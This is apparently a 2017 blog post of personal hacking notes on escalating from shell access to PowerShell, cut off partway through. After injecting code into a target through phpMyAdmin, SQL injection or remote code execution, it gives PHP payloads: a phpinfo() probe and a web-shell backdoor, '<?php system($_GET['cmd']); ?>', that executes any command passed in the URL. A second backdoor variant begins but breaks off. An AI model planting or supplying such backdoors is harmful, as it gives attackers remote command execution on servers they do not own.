Skip to main content

Posts

Showing posts from December, 2017

From SHELL to POWERSHELL

Just to keep for my notes and reference. Because sometime hard to recall back on #HowTo See 'clam' for more and `bash' for a shell script! ___ .-"; ! ;"-. .'! : | : !`. /\ ! : ! : ! /\ /\ | ! :|: ! | /\ ( \ \ ; :!: ; / / ) ( `. \ | !:|:! | / .' ) (`. \ \ \!:|:!/ / / .') \ `.`.\ |!|! |/,'.' / `._`.\\\!!!// .'_.' `.`.\\|//.'.' |`._`n'_.'| hjw "----^----" Ok, let's assume that we are able to inject some malicious payload/code like using phpMyAdmin or whatever low-hanging fruits on the target SQLi, RCE or whatever. 1. For PHP these are the useful code: ======== PHP Info ======== <? phpinfo(); ?> This might be useful for us to identify file path and default folder etc. ================ Simple PHP Backdoor ================ <?php system($_GET['cmd']); ? > or <?php if(isset($_REQUEST[&#